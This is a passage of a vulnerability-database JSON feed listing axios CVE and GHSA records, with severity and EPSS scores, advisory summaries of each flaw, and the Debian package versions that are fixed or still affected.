","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-03-07T19:32:00Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-27152","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/A
T:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-27152"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1102223","reference_id":"1102223","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1102223"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2350618","reference_id":"2350618","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2350618"},{"reference_url":"https://github.com/advisories/GHSA-jr5f-v2jv-69x6","reference_id":"GHSA-jr5f-v2jv-69x6","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jr5f-v2jv-69x6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/932083?format=json","purl":"pkg:deb/debian/node-axios@1.8.4%2Bdfsg-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.8.4%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932082?format=json","purl":"pkg:deb/debian/node-axios@1.14.0%2Bdfsg-1?distro=trixie","is_vulnerable
":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.14.0%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1062504?format=json","purl":"pkg:deb/debian/node-axios@1.15.0-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.0-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2025-27152","GHSA-jr5f-v2jv-69x6"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hq6f-86aj-8yav"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/350545?format=json","vulnerability_id":"VCID-kgnf-z6ca-tqgp","summary":"Axios HTTP/2 Session Cleanup State Corruption 
Vulnerability","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-39865.json","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-39865.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-39865","reference_id":"","reference_type":"","scores":[{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01675","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01685","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.017","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02445","published_at":"2026-05-05T12:55:00Z"},{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.031","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03544","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03412","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03542","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03423","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03538","published_at":"2026-04-24T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-39865"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-39865","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-39865"},{"reference_url":"https://github.com/axios/axios","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","sco
ring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios"},{"reference_url":"https://github.com/axios/axios/releases/tag/v1.13.2","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-08T16:05:44Z/"}],"url":"https://github.com/axios/axios/releases/tag/v1.13.2"},{"reference_url":"https://github.com/axios/axios/commit/0588880ac7ddba7594ef179930493884b7e90bf5","reference_id":"0588880ac7ddba7594ef179930493884b7e90bf5","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-08T16:05:44Z/"}],"url":"https://github.com/axios/axios/commit/0588880ac7ddba7594ef179930493884b7e90bf5"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2456538","reference_id":"2456538","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2456538"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-39865","reference_id":"CVE-2026-39865","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-39865"},{"reference_url":"https://github.com/advisories/GHSA-qj83-cq47-w5f8","reference_id":"GHSA-qj83-cq47-w5f8","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qj83-cq
47-w5f8"},{"reference_url":"https://github.com/axios/axios/security/advisories/GHSA-qj83-cq47-w5f8","reference_id":"GHSA-qj83-cq47-w5f8","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-08T16:05:44Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-qj83-cq47-w5f8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1059641?format=json","purl":"pkg:deb/debian/node-axios@1.13.2%2Bdfsg-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.13.2%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932082?format=json","purl":"pkg:deb/debian/node-axios@1.14.0%2Bdfsg-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.14.0%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1062504?format=json","purl":"pkg:deb/debian/node-axios@1.15.0-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/package
s/pkg:deb/debian/node-axios@1.15.0-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2026-39865","GHSA-qj83-cq47-w5f8"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kgnf-z6ca-tqgp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/354415?format=json","vulnerability_id":"VCID-nmzm-1341-jfgt","summary":"Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, a prototype pollution gadget exists in the Axios HTTP adapter (lib/adapters/http.js) that allows an attacker to inject arbitrary HTTP headers into outgoing requests. The vulnerability exploits duck-type checking of the data payload, where if Object.prototype is polluted with getHeaders, append, pipe, on, once, and Symbol.toStringTag, Axios misidentifies any plain object payload as a FormData instance and calls the attacker-controlled getHeaders() function, merging the returned headers into the outgoing request. The vulnerable code resides exclusively in lib/adapters/http.js. The prototype pollution source does not need to originate from Axios itself — any prototype pollution primitive in any dependency in the application's dependency tree is sufficient to trigger this gadget. 
This vulnerability is fixed in 1.15.1 and 0.31.1.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42035.json","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42035.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42035","reference_id":"","reference_type":"","scores":[{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.09688","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00063","scoring_system":"epss","scoring_elements":"0.19487","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00083","scoring_system":"epss","scoring_elements":"0.23971","published_at":"2026-05-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42035"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42035","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42035"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878","reference_id":"1134878","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461606","reference_id":"2461606","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461606"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42035","reference_id":"CVE-2026-42035","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42035"},{"reference_url":"https://github.com/advisories/GHSA-6chq-wfr3-2hj9","reference_id":"GHSA-6chq-wfr3-2hj9","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6chq-wfr3-2hj9"},{"reference_url":"https://github.com/a
xios/axios/security/advisories/GHSA-6chq-wfr3-2hj9","reference_id":"GHSA-6chq-wfr3-2hj9","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-24T18:07:43Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-6chq-wfr3-2hj9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2026-42035","GHSA-6chq-wfr3-2hj9"],"risk_score":3.4,"exploitability":"0.5","weighted_severity":"6.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-nmzm-1341-jfgt"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/354608?format=json","vulnerability_id":"VCID-p78g-vmhn-yyck","summary":"Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, the Axios library's XSRF token protection logic uses JavaScript truthy/falsy semantics instead of strict boolean comparison for the withXSRFToken config property. When this property is set to any truthy non-boolean value (via prototype pollution or misconfiguration), the same-origin check (isURLSameOrigin) is short-circuited, causing XSRF tokens to be sent to all request targets including cross-origin servers controlled by an attacker. 
This vulnerability is fixed in 1.15.1 and 0.31.1.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42042.json","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42042.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42042","reference_id":"","reference_type":"","scores":[{"value":"0.00028","scoring_system":"epss","scoring_elements":"0.07769","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00032","scoring_system":"epss","scoring_elements":"0.09172","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00035","scoring_system":"epss","scoring_elements":"0.10028","published_at":"2026-05-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42042"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42042","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42042"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878","reference_id":"1134878","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461637","reference_id":"2461637","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461637"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42042","reference_id":"CVE-2026-42042","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42042"},{"reference_url":"https://github.com/advisories/GHSA-xx6v-rp6x-q39c","reference_id":"GHSA-xx6v-rp6x-q39c","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xx6v-rp6x-q39c"},{"reference_url":"https://github.c
om/axios/axios/security/advisories/GHSA-xx6v-rp6x-q39c","reference_id":"GHSA-xx6v-rp6x-q39c","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-27T17:35:32Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-xx6v-rp6x-q39c"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2026-42042","GHSA-xx6v-rp6x-q39c"],"risk_score":2.8,"exploitability":"0.5","weighted_severity":"5.5","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-p78g-vmhn-yyck"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/354607?format=json","vulnerability_id":"VCID-tdwz-gg36-mkgs","summary":"Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, the encode() function in lib/helpers/AxiosURLSearchParams.js contains a character mapping (charMap) at line 21 that reverses the safe percent-encoding of null bytes. After encodeURIComponent('\\x00') correctly produces the safe sequence %00, the charMap entry '%00': '\\x00' converts it back to a raw null byte. Primary impact is limited because the standard axios request flow is not affected. 
This vulnerability is fixed in 1.15.1 and 0.31.1.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42040","reference_id":"","reference_type":"","scores":[{"value":"0.00029","scoring_system":"epss","scoring_elements":"0.08178","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.09718","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00044","scoring_system":"epss","scoring_elements":"0.13204","published_at":"2026-05-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42040"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42040","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42040"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878","reference_id":"1134878","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42040","reference_id":"CVE-2026-42040","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42040"},{"reference_url":"https://github.com/advisories/GHSA-xhjh-pmcv-23jw","reference_id":"GHSA-xhjh-pmcv-23jw","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xhjh-pmcv-23jw"},{"reference_url":"https://github.com/axios/axios/security/advisories/GHSA-xhjh-pmcv-23jw","reference_id":"GHSA-xhjh-pmcv-23jw","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-27T13:48:02Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-xhjh-pmcv-23jw"}],"fixed_packages":[{"url
":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2026-42040","GHSA-xhjh-pmcv-23jw"],"risk_score":1.6,"exploitability":"0.5","weighted_severity":"3.3","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-tdwz-gg36-mkgs"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/354419?format=json","vulnerability_id":"VCID-uuzj-ta8k-c3fn","summary":"Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, toFormData recursively walks nested objects with no depth limit, so a deeply nested value passed as request data crashes the Node.js process with a RangeError. This vulnerability is fixed in 1.15.1 and 0.31.1.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42039.json","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42039.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42039","reference_id":"","reference_type":"","scores":[{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.11939","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00042","scoring_system":"epss","scoring_elements":"0.12828","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00052","scoring_system":"epss","scoring_elements":"0.16082","published_at":"2026-05-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42039"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42039","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42039
"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878","reference_id":"1134878","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461630","reference_id":"2461630","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461630"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42039","reference_id":"CVE-2026-42039","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42039"},{"reference_url":"https://github.com/advisories/GHSA-62hf-57xw-28j9","reference_id":"GHSA-62hf-57xw-28j9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-62hf-57xw-28j9"},{"reference_url":"https://github.com/axios/axios/security/advisories/GHSA-62hf-57xw-28j9","reference_id":"GHSA-62hf-57xw-28j9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T18:14:11Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-62hf-57xw-28j9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2026-42039","GHSA-62hf-57xw-28j9"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-uuzj-ta8k-c3fn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/354416
?format=json","vulnerability_id":"VCID-wbq8-z3qg-bfbt","summary":"Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, when responseType: 'stream' is used, Axios returns the response stream without enforcing maxContentLength. This bypasses configured response-size limits and allows unbounded downstream consumption. This vulnerability is fixed in 1.15.1 and 0.31.1.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42036.json","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42036.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42036","reference_id":"","reference_type":"","scores":[{"value":"0.00039","scoring_system":"epss","scoring_elements":"0.11525","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00039","scoring_system":"epss","scoring_elements":"0.11627","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.15633","published_at":"2026-05-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42036"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42036","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42036"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878","reference_id":"1134878","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461633","reference_id":"2461633","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461633"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42036","reference_id":"CVE-2026-42036","reference_type":"","scores":[],"ur
l":"https://nvd.nist.gov/vuln/detail/CVE-2026-42036"},{"reference_url":"https://github.com/advisories/GHSA-vf2m-468p-8v99","reference_id":"GHSA-vf2m-468p-8v99","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vf2m-468p-8v99"},{"reference_url":"https://github.com/axios/axios/security/advisories/GHSA-vf2m-468p-8v99","reference_id":"GHSA-vf2m-468p-8v99","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T18:30:17Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-vf2m-468p-8v99"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CV